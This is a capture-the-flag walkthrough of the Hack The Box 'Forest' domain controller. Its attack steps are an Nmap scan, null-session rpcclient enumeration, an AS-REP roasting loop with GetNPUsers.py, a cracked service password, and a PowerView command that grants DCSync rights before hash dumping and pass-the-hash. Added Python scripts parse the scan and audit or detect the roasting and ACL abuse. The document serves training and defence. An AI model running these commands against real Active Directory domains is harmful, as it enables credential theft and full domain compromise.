Forest

The document describes an Nmap scan of a target system that reveals open ports and services running on them. Further enumeration using tools like rpcclient, GetNPUsers.py, John, crackmapexec, and Bloodhound is able to retrieve user credentials and identify a method for escalating privileges to the Administrator account to obtain the root flag.

Uploaded by

gophish22

Forest

Recon

nmap

Nmap scan report for 10.10.10.161
Host is up (0.096s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-02 00:18:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49955/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-08-01T17:18:55-07:00
| smb2-time:
|   date: 2022-08-02T00:18:54
|_  start_date: 2022-08-01T14:40:19
|_clock-skew: mean: 2h26m44s, deviation: 4h02m30s, median: 6m43s
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 1 18:12:22 2022 -- 1 IP address (1 host up) scanned in 69.56 seconds
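Added example, not from the original write-up: a small parser for Nmap's normal output that turns a listing like the one above into records and reports what the open ports say about the host's role, so a scan can be checked against the asset inventory (is a domain controller supposed to be reachable from this segment, is WinRM exposed, is SMB signing enforced). The excerpt embedded in the script is trimmed from the scan above; the port-to-role mapping and the field names are my own choices.

```python
"""Parse Nmap 'normal' output into structured records and summarise the host's
role from its exposed services. Added example for this write-up."""
import re
from dataclasses import dataclass

# Excerpt of the scan shown above, trimmed to the lines the parser needs.
SCAN = """\
Nmap scan report for 10.10.10.161
Host is up (0.096s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-02 00:18:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
|   Domain name: htb.local
|   FQDN: FOREST.htb.local
| smb-security-mode:
|   account_used: <blank>
|_  message_signing: required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Indented "key: value" lines produced by NSE host scripts.
FIELD_RE = re.compile(r"^\|_?\s+([A-Za-z_ ]+?):\s*(.*)$")

# Ports that together identify an Active Directory domain controller
# (my grouping, not an Nmap category).
DC_PORTS = {53, 88, 389, 464, 636, 3268, 3269, 9389}
REMOTE_MGMT = {5985: "WinRM (HTTP)", 5986: "WinRM (HTTPS)", 3389: "RDP"}


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


def parse_scan(text):
    """Return (host, ports, script_fields) from Nmap normal output."""
    host, ports, fields = None, [], {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m[1]), m[2], m[3], m[4], m[5].strip()))
            continue
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1]
            continue
        f = FIELD_RE.match(line)
        if f:
            fields[f[1].strip()] = f[2].strip()
    return host, ports, fields


def summarise(text):
    """Condense a scan into the facts a reviewer checks against inventory."""
    host, ports, fields = parse_scan(text)
    open_ports = {p.number for p in ports if p.state == "open"}
    return {
        "host": host,
        "open_ports": sorted(open_ports),
        # Kerberos (88) plus LDAP (389) is the minimum DC signature;
        # the other DC ports strengthen the call.
        "is_domain_controller": {88, 389} <= open_ports,
        "dc_ports_seen": sorted(open_ports & DC_PORTS),
        "domain": fields.get("Domain name"),
        "fqdn": fields.get("FQDN"),
        "smb_signing_required": fields.get("message_signing") == "required",
        "remote_mgmt": [REMOTE_MGMT[p] for p in sorted(open_ports) if p in REMOTE_MGMT],
    }


if __name__ == "__main__":
    for key, value in summarise(SCAN).items():
        print(f"{key}: {value}")
```

For the scan above the summary calls the host a domain controller for htb.local with SMB signing required and WinRM reachable; the same function run over a network's scan output gives a quick list of hosts whose role does not match what the inventory says they should be.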

Port 135/TCP - Microsoft Windows RPC

Using rpcclient we see that a null session is allowed, and we are able to enumerate the Active Directory users and groups as well.

AS-REP Roasting attack

First, let's use rpcclient to enumerate the users:

rpcclient -U "" 10.10.10.161 -N -c "enumdomusers" | awk -F'[][]' '{print $2}' > users

We now have the list of users.
GetNPUsers.py

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

We found a TGT (AS-REP hash) for svc-alfresco.


John

John cracks the hash: s3rvice

crackmapexec

Validating the credentials with crackmapexec, we get a (Pwn3d!).
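The foothold works because the svc-alfresco account has Kerberos pre-authentication disabled, which is exactly the condition GetNPUsers.py searches for. As an added example, not part of the write-up, the script below shows the two checks a defender would run against this path: an audit of the userAccountControl flag that enables it, and a detector over Event ID 4768 records that flags TGT requests made without pre-authentication and with RC4 ticket encryption. The account export and the event records are constructed sample data; the account names echo the box, the flag values and IP addresses are made up.

```python
"""Defensive checks for AS-REP roasting. Added example, not the write-up's code.

1. audit_preauth(): list enabled accounts whose userAccountControl has the
   DONT_REQUIRE_PREAUTH bit (0x400000) set, so they can be fixed before
   anyone roasts them.
2. detect_asrep_roast(): flag Kerberos TGT requests (Event ID 4768) made with
   Pre-Authentication Type 0 and RC4 (0x17) ticket encryption, the footprint
   an AS-REP roasting tool leaves on the domain controller.
"""

# userAccountControl flag bits (documented AD values).
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed export, in the shape an LDAP query such as
# (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
# returns. Names echo the box; the flag values are made up for the example.
ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400202},  # disabled
    {"sAMAccountName": "sebastien", "userAccountControl": 0x200},
]


def audit_preauth(accounts):
    """Return enabled accounts that do not require Kerberos pre-authentication."""
    findings = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE:
            findings.append(acct["sAMAccountName"])
    return findings


# Constructed 4768 records reduced to the EventData fields the rule needs.
# PreAuthType 0 = no pre-auth, 2 = PA-ENC-TIMESTAMP (normal logon).
# TicketEncryptionType 0x17 = RC4-HMAC, 0x12 = AES256. Status 0x0 = success.
EVENTS_4768 = [
    {"TargetUserName": "sebastien", "PreAuthType": 2, "TicketEncryptionType": 0x12,
     "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "svc-alfresco", "PreAuthType": 0, "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "svc-alfresco", "PreAuthType": 0, "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "FOREST$", "PreAuthType": 2, "TicketEncryptionType": 0x12,
     "IpAddress": "::1", "Status": "0x0"},
    # KDC_ERR_C_PRINCIPAL_UNKNOWN: a failed request yields no hash.
    {"TargetUserName": "nobody", "PreAuthType": 0, "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.14.5", "Status": "0x6"},
]


def detect_asrep_roast(events):
    """Group successful no-pre-auth RC4 TGT requests by requesting address."""
    hits = {}
    for ev in events:
        if ev["PreAuthType"] != 0 or ev["TicketEncryptionType"] != 0x17:
            continue
        if ev["Status"] != "0x0":
            continue
        hits.setdefault(ev["IpAddress"], set()).add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in hits.items()}


if __name__ == "__main__":
    print("Accounts without pre-auth:", audit_preauth(ACCOUNTS))
    print("Roasting suspects by source:", detect_asrep_roast(EVENTS_4768))
```

The RC4 condition mirrors the classic detection rule; in an environment with no legitimate no-pre-auth logons, alerting on PreAuthType 0 alone is simpler and also covers requests that ask for AES tickets. The lasting fix is the audit result: clear the flag on svc-alfresco, or give the account a long random password if some legacy client truly needs pre-auth disabled.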

Evil-Winrm

user.txt

ldapdomaindump

Host an HTTP server to preview the dumped data.

Bloodhound

SharpHound.ps1

We see a potential way to escalate privileges to the Administrator user.

Account Operators group

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups

Creating a new user (Account Operators can create accounts)

WriteDACL

Adding myself to the Exchange Windows Permissions group

PowerView.ps1

Import it and run the following:

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity b3t4m3 -Rights DCSync

Now we should be able to use secretsdump.py to dump the credential hashes stored in ntds.dit.
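The escalation chain above exists because the Exchange Windows Permissions group holds WriteDacl on the domain object, and WriteDacl is enough to grant oneself the replication rights DCSync needs. Added example, not the write-up's code: an audit of a constructed, simplified domain-root ACL that lists who could DCSync and who could rewrite the DACL, compared against the principals expected to hold those rights. The GUIDs and access-mask bits are the documented AD values; the ACE list, including the b3t4m3 entries the PowerView command above would create, is constructed for the example.

```python
"""Audit a domain-root ACL for the two rights abused in this write-up:
WriteDacl (lets a principal grant itself anything on the object) and the
directory-replication extended rights that together make up DCSync.
Added example; the ACE list is a constructed, simplified rendering of what
nTSecurityDescriptor on DC=htb,DC=local would decode to."""

# Access-mask bits (ADS_RIGHTS_ENUM, documented values).
RIGHT_DS_CONTROL_ACCESS = 0x00000100  # extended right, qualified by ObjectType GUID
RIGHT_WRITE_DAC = 0x00040000
RIGHT_WRITE_OWNER = 0x00080000
RIGHT_GENERIC_ALL = 0x10000000

# Extended-right GUIDs for directory replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Principals that legitimately hold these rights on a domain naming context.
EXPECTED_REPLICATORS = {"Domain Controllers", "Enterprise Domain Controllers",
                        "Administrators", "Domain Admins", "Enterprise Admins"}
EXPECTED_DACL_WRITERS = {"Administrators", "Domain Admins", "Enterprise Admins", "SYSTEM"}

# Constructed ACEs: (trustee, access mask, ObjectType GUID or None).
# The b3t4m3 entries are what "Add-DomainObjectAcl ... -Rights DCSync" adds.
DOMAIN_ROOT_ACL = [
    ("Domain Controllers", RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    ("Domain Controllers", RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    ("Enterprise Domain Controllers", RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    ("Administrators", RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    ("Administrators", RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    ("Domain Admins", RIGHT_GENERIC_ALL, None),
    ("Exchange Windows Permissions", RIGHT_WRITE_DAC, None),
    ("b3t4m3", RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    ("b3t4m3", RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
]


def dcsync_capable(acl):
    """Trustees holding both replication rights, directly or via a blanket grant."""
    held = {}
    for trustee, mask, guid in acl:
        rights = held.setdefault(trustee, set())
        if guid is None and mask & (RIGHT_GENERIC_ALL | RIGHT_DS_CONTROL_ACCESS):
            rights |= DCSYNC_GUIDS  # an unqualified grant covers every extended right
        elif mask & RIGHT_DS_CONTROL_ACCESS and guid in DCSYNC_GUIDS:
            rights.add(guid)
    return sorted(t for t, rights in held.items() if DCSYNC_GUIDS <= rights)


def can_rewrite_dacl(acl):
    """Trustees able to change the ACL itself, and so grant themselves DCSync."""
    escalating = RIGHT_WRITE_DAC | RIGHT_WRITE_OWNER | RIGHT_GENERIC_ALL
    return sorted({t for t, mask, guid in acl if guid is None and mask & escalating})


def audit_domain_root(acl):
    """Report only the principals that should not hold each right."""
    return {
        "unexpected_dcsync": [t for t in dcsync_capable(acl) if t not in EXPECTED_REPLICATORS],
        "unexpected_dacl_writers": [t for t in can_rewrite_dacl(acl) if t not in EXPECTED_DACL_WRITERS],
    }


if __name__ == "__main__":
    for finding, who in audit_domain_root(DOMAIN_ROOT_ACL).items():
        print(f"{finding}: {who}")
```

Run before the escalation, the audit reports only Exchange Windows Permissions as an unexpected DACL writer, which is the finding to remediate (Exchange's split-permissions model removes that grant); run afterwards, it also reports b3t4m3 as an unexpected DCSync holder, the trace a periodic ACL diff would catch.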

Priv esc

Pass the hash

root.txt
